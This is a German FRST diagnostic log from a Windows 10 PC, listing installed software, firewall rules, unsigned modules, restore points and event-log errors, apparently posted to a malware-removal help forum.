Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 de) (HKLM\...\Mozilla Firefox 84.0.2 (x64 de)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.2 - Mozilla)
Mozilla Thunderbird 78.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 78.6.0 (x86 de)) (Version: 78.6.0 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MyEpson Portal (HKLM-x32\...\{3361D415-BA35-4143-B301-661991BA6219}) (Version: 1.1.2.2 - SEIKO EPSON CORPORATION) Hidden
MyEpson Portal (HKLM-x32\...\MyEpson Portal) (Version:  - SEIKO EPSON Corporation)
mz-32 Simulator version 1.0 (HKLM-x32\...\{02920757-F57F-4724-83CC-A99C827792E2}_is1) (Version: 1.0 - Graupner)
Naviextras Toolbox Prerequesities (HKLM-x32\...\{537575D6-3B96-474C-BD8F-DFF667363DBD}) (Version: 1.0.0 - NNG Llc.)
NVIDIA 3D Vision Controller-Treiber 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Grafiktreiber 456.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 456.71 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.35 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
Photo & Graphic Designer Update (HKLM\...\{41D70490-924E-470F-847F-CD3BB1A65637}) (Version: 12.5.1.48446 - MAGIX Software GmbH) Hidden
Pinnacle Instant DVD Recorder (HKLM-x32\...\{EF781A5C-58F5-4BFD-87F9-E4F14D382F25}) (Version: 2.00.088 - )
proDAD Heroglyph 2.5 (HKLM-x32\...\proDAD-Heroglyph-2.5) (Version:  - )
proDAD Vitascene 1.0 (HKLM-x32\...\proDAD-Vitascene-1.0) (Version:  - )
simpliclean (HKLM-x32\...\simplitec POWER SUITE_is1) (Version: 2.4.4.68 - simplitec GmbH)
Studio 11 (HKLM-x32\...\{110B1ADF-2EAE-4E8F-B501-D2A1E6D8ED9D}) (Version: 11.0 - Pinnacle Systems)
Studio 11 (HKLM-x32\...\{2F952048-3220-4AC7-A206-D01EFC774BB2}) (Version: 11.0.0.0 - Pinnacle Systems) Hidden
Studio 11 Bonus DVD (HKLM-x32\...\{45A1BF92-700A-4408-B95E-79F462E3D67D}) (Version: 11.0.0.0 - Pinnacle Systems)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{E1D7CB46-BAE9-4D58-99C4-582332B1755A}) (Version: 1.13.0.0 - Microsoft Corporation) Hidden
Windows 10-Update-Assistent (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22395 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows-Treiberpaket - Silicon Laboratories Inc. (silabser) Ports  (05/23/2018 6.7.6.2130) (HKLM\...\C9C3E5CCB43EEF685DD0E2BB4263DDC88C9B3834) (Version: 05/23/2018 6.7.6.2130 - Silicon Laboratories Inc.)
Yahoo! Desktop Login (HKLM-x32\...\{F9AEEC34-CF00-4CBD-9E36-DF9DC4002685}) (Version: 1.00.0001 - Pinnacle Systems) Hidden

Packages:
=========
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-09-13] (Microsoft Corporation)
Ihr Smartphone -> C:\Program Files\WindowsApps\Microsoft.YourPhone_1.20081.117.0_x64__8wekyb3d8bbwe [2020-09-05] (Microsoft Corporation)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-30] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-20] (Microsoft Studios) [MS Ad]
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-716491260-3257532223-3478221735-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Peter\AppData\Local\GoToMeeting\17359\G2MOutlookAddin64.dll => Keine Datei
ContextMenuHandlers2-x32: [InCDMenu] -> {950FF917-7A57-46BC-8017-59D9BF474000} => C:\Program Files (x86)\Ahead\InCD\incdshx.dll -> Keine Datei
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>  -> Keine Datei
ContextMenuHandlers5-x32: [InCDMenu] -> {950FF917-7A57-46BC-8017-59D9BF474000} => C:\Program Files (x86)\Ahead\InCD\incdshx.dll -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2020-10-01] (NVIDIA Corporation -> NVIDIA Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [VIDC.MJPG] => C:\Windows\SysWOW64\Pvmjpg30.dll [401408 2005-07-12] (Pegasus Imaging Corporation) [Datei ist nicht signiert]

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Peter\Favorites\Downloadseite von NCH Software.lnk -> hxxp://www.nchsoftware.com/de/index.htm
ShortcutWithArgument: C:\Users\Peter\Desktop\Photovoltaik.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> "hxxp:\\192.168.0.2"

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2018-06-14 11:18 - 2018-06-14 11:18 - 000011776 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\libEGL.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 002013696 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\libGLESv2.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000739840 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-12-17 10:11 - 2015-12-17 10:11 - 000132096 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON Software\Event Manager\epnsm.dll
2009-10-21 16:39 - 2009-10-21 16:39 - 000291328 _____ (SEIKO EPSON CORPORATION) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON Software\Event Manager\LcMgr.dll
2019-02-22 16:01 - 2019-02-22 16:01 - 000704512 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\Configration_00000171\MepCfg.dll
2020-04-17 09:15 - 2020-04-17 09:15 - 000577536 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\MepUploader_00000542\MepUploader.dll
2019-02-22 14:09 - 2019-02-22 14:09 - 000475136 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\Online Manual_00000013\MepFAQ.dll
2018-09-18 11:43 - 2018-09-18 11:43 - 000213504 _____ (simplitec GmbH) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\MrStyler.dll
2018-09-18 11:43 - 2018-09-18 11:43 - 000288256 _____ (simplitec GmbH) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\MrTracker.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000045568 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\bearer\qgenericbearer.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000047616 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\bearer\qnativewifibearer.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000049664 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qdds.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000029696 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qgif.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000037376 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qicns.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000030208 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qico.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000459776 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qjp2.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000236544 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qjpeg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000275456 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qmng.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000023552 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qsvg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000022528 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qtga.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000351744 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qtiff.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000021504 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qwbmp.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000374784 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qwebp.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 001212928 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\platforms\qwindows.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005500416 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Core.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005804544 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Gui.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 001064448 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Network.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 003189248 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Qml.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 002928128 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Quick.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000310784 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Svg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005446144 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Widgets.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000015360 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick.2\qtquick2plugin.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000072192 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Layouts\qquicklayoutsplugin.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000015360 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Window.2\windowplugin.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\S-1-5-21-716491260-3257532223-3478221735-1001 -> {70A7EBAE-DA5A-4BBF-ADEA-6ECF768BF958} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=MGX&o=15359&src=kw&q={searchTerms}&locale=de_DE&apn_ptnrs=^JQ&apn_dtid=^YYYYYY^YY^DE&apn_uid=79DE322B-A6B7-46C4-ACAD-51A5594CEA42&apn_sauid=ADB29B8A-9FD7-4DC6-9AFE-C5F3256C5419
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Keine Datei

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2016-07-16 12:47 - 2016-07-16 12:45 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{65781923-5A50-4B8F-9101-B10D258E3705}] => (Allow) C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe (MAGIX Software GmbH -> MAGIX)
FirewallRules: [{2EA6A397-2399-407F-8DA7-CC979FB10EC2}] => (Allow) C:\Program Files\Common Files\MAGIX Services\MxCloudSync\MxCloudSync.exe (MAGIX Software GmbH -> MAGIX)
FirewallRules: [{DBAEB576-2FBB-4C5E-887D-253C7D978253}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
FirewallRules: [{DC1C1F3B-A31C-4ABF-9DB8-BAA499E6EC29}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
FirewallRules: [{7FEA5C8B-41AA-47AA-AB42-EE8B98EEC153}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{EFC05FE9-0631-47C8-8829-F88236543D1D}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1DBD2E7A-D78B-4AC9-A081-F7C38FD80ABE}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{33BC60E0-F131-4EAF-847C-CB0EE0CF51E6}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{85CE0E62-F6F7-4BE1-89B8-D5AB0178F2D1}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{FF2976C1-4A2F-4F5F-819D-51D8720A3178}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{0C5DC20B-9CA3-4A7C-AC9F-6056E23A9757}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{66B29A8C-1662-4154-A30B-FEC1CBCD797E}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{7A080F98-A3E2-4F5A-B0CB-9CB65CD2C503}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{CDFC0017-575A-46DE-9133-409AFBD62C39}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{B5723925-285D-43DA-AB87-174217C0698C}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\PowerSuite.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{AE62C13B-87AE-4478-98E4-94E0B9B5DA6D}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\PowerSuite.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{83B73CBC-B790-4630-AB96-4313987A6044}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe => Keine Datei
FirewallRules: [{089F6DD6-FFB4-4EE6-90BC-133177D6DB95}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe => Keine Datei
FirewallRules: [{E78384C4-42D9-447E-AB1C-6BD6707DC1F8}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe => Keine Datei
FirewallRules: [{07FA2E7B-A038-44BB-9C18-177704A48D70}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe => Keine Datei
FirewallRules: [{CE82E4DB-AC72-4603-BBF5-1FECC3641F49}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe => Keine Datei
FirewallRules: [{6481F0B3-4C3F-4335-A528-FE731D96F7AC}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe => Keine Datei
FirewallRules: [{0C53BEA4-423A-4FD4-A758-11806EDE4BC3}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4B6DE64A-FDB2-4816-8BEF-E90AB2088FFF}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9CCB3E66-27F4-4B2D-839F-D41BA8498057}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4B07794B-8FE7-47C2-930F-0986D4C3C844}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{C6170BB2-9C85-45B7-A663-0C7F92A8D7C0}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{535E7441-07E0-4363-A4DE-4CB15D2E4B7B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{A6E67A19-69AC-4849-97BF-ADEA71F81C1E}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\umi.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{C28CB5C2-93DC-4E31-8755-850AE874974F}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\umi.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{4E11A4E0-B35E-499C-820E-3316A698B307}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\PMSRegisterFile.exe () [Datei ist nicht signiert]
FirewallRules: [{DEFB9033-AC35-43D8-9852-53F9CA3FB3DC}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\PMSRegisterFile.exe () [Datei ist nicht signiert]
FirewallRules: [{8C086B40-D8F0-4F42-A5AF-6ED7075EBCE4}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\Studio.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{46FED456-01B9-4FDA-AAA7-30B031C8D13B}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\Studio.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{5D328195-9B4E-43F0-AA72-96613C29D39F}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\RM.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{69E66B2A-B22A-4503-AE6F-07F07BC2245E}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\RM.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{D29AC411-467F-4416-B78A-8569A1C2DFF9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe => Keine Datei
FirewallRules: [{D97DA325-BD62-4F0D-B0D7-6296D6997D38}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe => Keine Datei
FirewallRules: [{6B70FC3E-B345-4FD9-85C3-2A1FC0C17A34}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe => Keine Datei
FirewallRules: [{DFA8AADA-88FC-42CA-9062-995E26FA6EF6}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{BFB25E99-F6C9-4EDC-A91D-C118EE06853F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{138DFF76-5C3D-469A-9D68-FC8479590C3E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{8DFF8679-2A71-4447-B774-EB60DA9BFE91}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{339D5AAB-06EB-4649-BCE1-808561764131}] => (Allow) C:\Program Files\MAGIX\Video deluxe Plus\2020\Videodeluxe.exe (MAGIX Software GmbH -> MAGIX Software GmbH)

==================== Wiederherstellungspunkte =========================

06-09-2020 08:16:58 Installed Epson Software Updater
19-09-2020 19:07:53 Windows Modules Installer
16-10-2020 09:03:00 Windows Modules Installer
24-10-2020 15:16:35 Windows Modules Installer
12-11-2020 19:01:41 
12-11-2020 19:01:57 Windows Update
22-11-2020 18:12:18 Konfiguriert AeroFly Professional Deluxe AddOn 3 (True Scale Add?à*!0
11-12-2020 10:35:05 Windows Modules Installer
31-12-2020 16:19:29 Windows Modules Installer
13-01-2021 22:03:54 Removed Adobe Acrobat Reader DC - Deutsch.

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/13/2021 10:10:29 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (01/13/2021 08:42:22 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (01/13/2021 08:35:20 PM) (Source: Firefox Default Browser Agent) (EventID: 12007) (User: )
Description: Event-ID 12007

Error: (01/13/2021 08:35:20 PM) (Source: Firefox Default Browser Agent) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/13/2021 08:32:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: InCD.exe, Version: 4.3.7.3, Zeitstempel: 0x41a724b6
Name des fehlerhaften Moduls: InCD.exe, Version: 4.3.7.3, Zeitstempel: 0x41a724b6
Ausnahmecode: 0xc000041d
Fehleroffset: 0x00015242
ID des fehlerhaften Prozesses: 0x3450
Startzeit der fehlerhaften Anwendung: 0x01d6e9e2df88dc96
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Ahead\InCD\InCD.exe
Pfad des fehlerhaften Moduls: C:\Program Files (x86)\Ahead\InCD\InCD.exe
Berichtskennung: 513a837f-141b-4921-bb39-40a15d33fe0e
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (01/13/2021 08:32:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: InCD.exe, Version: 4.3.7.3, Zeitstempel: 0x41a724b6
Name des fehlerhaften Moduls: InCD.exe, Version: 4.3.7.3, Zeitstempel: 0x41a724b6
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00015242
ID des fehlerhaften Prozesses: 0x3450
Startzeit der fehlerhaften Anwendung: 0x01d6e9e2df88dc96
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Ahead\InCD\InCD.exe
Pfad des fehlerhaften Moduls: C:\Program Files (x86)\Ahead\InCD\InCD.exe
Berichtskennung: cb17cee3-06e7-4a77-8f9e-b7a9b40a98f1
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (01/12/2021 03:25:33 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (01/12/2021 03:17:53 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.


Systemfehler:
=============
Error: (01/13/2021 10:45:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
